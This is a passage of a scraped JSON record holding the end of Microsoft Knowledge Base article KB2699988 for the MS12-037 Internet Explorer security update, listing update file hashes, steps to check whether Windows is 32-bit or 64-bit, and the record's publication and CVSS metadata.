class=\"sbody-td\">28F88822D3573C39DDC1840CC74FEFC7F25FBBB826DF7256AB9B2B486C32EE9C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-ara.exe</td><td class=\"sbody-td\">2DD679D6DD90B0E9DAAB849E8C0323F206387C58</td><td class=\"sbody-td\">95628E28AE52312CB60336D944C7450799323CB1EA7E9E1E049FCDF1F77D1404</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-cht.exe</td><td class=\"sbody-td\">19AE7498A0D539EEAA5E2A8F2D28277B22E856C8</td><td class=\"sbody-td\">D10912B18159C8B7F2020F45DBE151EDD1C6E4C993FDAFC2BBF50DDE0B61C365</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsxp-kb2699988-x86-custom-deu.exe</td><td class=\"sbody-td\">1A76EA27842C198D817CFD55843015D0DE559DF6</td><td class=\"sbody-td\">D3BA1973BB786B482BBECA33C04349A017A7E4E8A060369AD7AF2DE73544B808</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windows6.0-kb2699988-x64-custom.msu</td><td class=\"sbody-td\">75684F371AFF3CF1447A8CFB1E216060CE4EC7C7</td><td class=\"sbody-td\">0FF51FB9C7F23B421945D9BFFC60B1BE931B98E268206352586B391DF0E3B607</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windows6.0-kb2699988-x86.msu</td><td class=\"sbody-td\">AA13BEE8A823317B7ACEB466607F367387B5BCD5</td><td class=\"sbody-td\">C68187086AD80289FB7382950C8C997F659C69BE65884E17D293182270058DBC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windows6.0-kb2699988-x64.msu</td><td class=\"sbody-td\">FA89FAEA099735E482318B8140262F201D3905C8</td><td class=\"sbody-td\">46AF8E91EBBBCCEDA0783395792B1A0B13DB1DBAED84EEFDD0614F011D003AAB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windows6.0-kb2699988-x64-custom.msu</td><td class=\"sbody-td\">98D65BE591213EA09F5F0175BDA8087D46C397DA</td><td class=\"sbody-td\">F6EB40B592B9CF69023258612F355B5EACE3EAB3FE24501E2DD04507BB97DC3D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windows6.0-kb2699988-x86-custom.msu</td><td class=\"sbody-td\">BF57BE47A45B77D4DC8B5400065870FD7A46A466</td><td class=\"sbody-td\">F167531A7F5DC8A5BD213D905E7168F0DB9649A2CCF44E819725A0023B902FD6</td></tr></table></div><h3 class=\"sbody-h3\">How to determine whether you are running a 32-bit or a 64-bit edition of Windows<br/></h3>If you are not sure which version of Windows that you are running or whether it is a 32-bit version or 64-bit version, open System Information (Msinfo32.exe), and review the value that is listed for <strong class=\"uiterm\">System Type</strong>. To do this, follow these steps:<br/><ol class=\"sbody-num_list\"><li>Click <strong class=\"uiterm\">Start</strong>, and then click <strong class=\"uiterm\">Run</strong>, or click <strong class=\"uiterm\">Start Search</strong>. </li><li>Type <strong class=\"uiterm\">msinfo32.exe</strong> and then press ENTER. </li><li>In <strong class=\"uiterm\">System Information</strong>, review the value for <strong class=\"uiterm\">System Type</strong>.<br/><ul class=\"sbody-free_list\"><li>For 32-bit editions of Windows, the <strong class=\"uiterm\">System Type</strong> value is <strong class=\"uiterm\">x86-based PC</strong>. </li><li>For 64-bit editions of Windows, the <strong class=\"uiterm\">System Type</strong> value is <strong class=\"uiterm\">x64-based PC</strong>. </li></ul></li></ol><span>For more information about how to determine whether you are running a 32-bit or 64-bit edition of Windows, click the following article number to view the article in the Microsoft Knowledge Base:<br/><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/827218\" id=\"kb-link-27\">827218 </a>How to determine whether a computer is running a 32-bit version or a 64-bit version of the Windows operating system<br/></div></span></div></body></html>", "edition": 16, "modified": "2012-07-11T22:57:36", "id": "KB2699988", "href": "https://support.microsoft.com/en-us/help/2699988/", "published": "2012-06-12T00:00:00", "title": "MS12-037: Cumulative Security Update for Internet Explorer: June 12, 2012", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}
